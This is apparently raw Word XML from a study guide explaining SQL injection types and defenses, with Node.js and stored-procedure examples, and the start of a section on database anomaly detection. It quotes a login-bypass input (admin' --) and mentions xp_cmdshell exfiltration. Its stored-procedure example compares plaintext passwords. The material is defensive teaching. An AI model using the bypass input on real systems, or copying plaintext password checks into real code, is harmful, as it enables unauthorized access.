    <w:p w14:paraId="707E33BA" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability where an attacker can execute arbitrary SQL code on a database by manipulating the SQL queries sent to the database. This can lead to unauthorized access, data breaches, and data manipulation. SQL injection typically occurs when user input is not properly sanitized before being included in SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34936BB8"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How SQL Injection Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16984325" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Crafted Input</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The attacker provides specially crafted input that modifies the structure of an SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5498FD" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If an application has a login form that directly includes user input in a SQL query, such as SELECT * FROM users WHERE username = 'user_input', an attacker might input admin' --, which could alter the query to bypass authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E04BE" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The altered query is executed by the database, potentially granting the attacker access to sensitive data or allowing them to perform actions like modifying or deleting data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F88B6E7"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Types of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD9982" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In-Band SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4256BEAF" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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The attacker uses the same channel for both injecting the malicious SQL and retrieving the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE0ABB" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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Using UNION statements to retrieve data from other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E6288" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26B088" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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The attacker does not receive direct feedback from the database, but can infer information based on application behavior or responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F22EE" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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Using boolean conditions to determine whether the database response is true or false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FBCFEA" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Out-of-Band SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B641A7B" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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The attacker uses a different channel to retrieve results, such as sending data to an external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A588553" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>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Using xp_cmdshell or similar features to exfiltrate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF942C"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Preventing SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E43FB6" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Prepared Statements (Parameterized Queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D2042"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Prepared statements ensure that user inputs are treated as data, not executable code. This method separates SQL code from data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B3043"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76E5DD79"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Using Node.js with a parameterized query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E5CD9"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query = 'SELECT * FROM users WHERE username = ? AND password = ?';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECCE46"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params = [username, password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1F406"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db.query(query, params, function(err, results) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB648A"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107D0496"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handle results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725AB1C"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B2228FC" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Stored Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B4742"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Stored procedures execute predefined queries and are a way to encapsulate SQL logic on the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32395E42"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03213C84"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CREATE PROCEDURE GetUser(IN userName VARCHAR(50), IN userPassword VARCHAR(50))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B3EBD"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0942A7A4"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SELECT * FROM users WHERE username = userName AND password = userPassword;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25F3ED"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BB187"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F27965B"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db.query('CALL GetUser(?, ?)', [username, password], function(err, results) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFDCA1"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077FCF7A"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handle results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D473DA2"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114402D" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Escape User Inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EECD66"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Ensure that any user input used in SQL queries is properly escaped to neutralize potentially harmful characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A8DBC"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1FD4F8C1"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Using Node.js with an escaping function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857B6EA"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safeUsername = db.escape(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68110EB0"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query = `SELECT * FROM users WHERE username = ${safeUsername}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D746A"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db.query(query, function(err, results) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17F7BA"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throw err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25875FBB"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handle results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55705582"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18D4E7E" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validate and Sanitize Inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350911B0"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Validate user inputs to ensure they meet expected formats and sanitize inputs to remove or neutralize potentially dangerous characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F86594"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392B23E"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Validation example in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCCD242"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if (!/^[a-zA-Z0-9_]+$/.test(username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB10BB" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A"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throw new Error('Invalid username');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EADBF35" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D3609" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Least Privilege Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065ED2B0"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Ensure database accounts used by the application have only the necessary permissions required for their tasks. Avoid using accounts with high privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC54E20"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Use separate database accounts for read and write operations, minimizing the risk if an account is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7253178F" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly Update and Patch Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BBC58D"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Keep your database management systems, libraries, and frameworks updated to protect against known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696B51F"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Apply security patches and updates provided by database vendors and library maintainers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF4CB0" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement Web Application Firewalls (WAFs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DE164"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lastRenderedPageBreak/>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use WAFs to detect and block malicious SQL injection attempts before they reach the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C9111"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Configure a WAF to filter out SQL injection patterns and anomalous query behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21362DEB" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conduct Regular Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C43B3"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Perform security assessments, including penetration testing and code reviews, to identify and address SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DEDC3" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>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Use tools like OWASP ZAP or Burp Suite to test your application's defenses against SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC796EC" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C2F550" w14:textId="38F037C4" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc178383322"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the concept of </w:t>
      </w:r>
      <w:bookmarkStart w:id="140" w:name="_Hlk174810247"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>database anomaly detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="2B4A3918" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database anomaly detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves identifying unusual patterns or behaviors in database activity that may indicate potential issues such as performance problems, security breaches, or data integrity issues. Anomalies can be signs of various issues including unauthorized access, data corruption, or inefficient queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D2130"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Types of Database Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F159D" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D0672" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>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Slow query execution, unexpected spikes in resource usage, increased response times, or unusual query patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D1829" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can affect user experience and overall system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864A113" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47846158" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>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Unusual access patterns, unauthorized data access attempts, unexpected changes to user permissions, or anomalous login activities.</w:t>
      </w:r>
    </w:p>
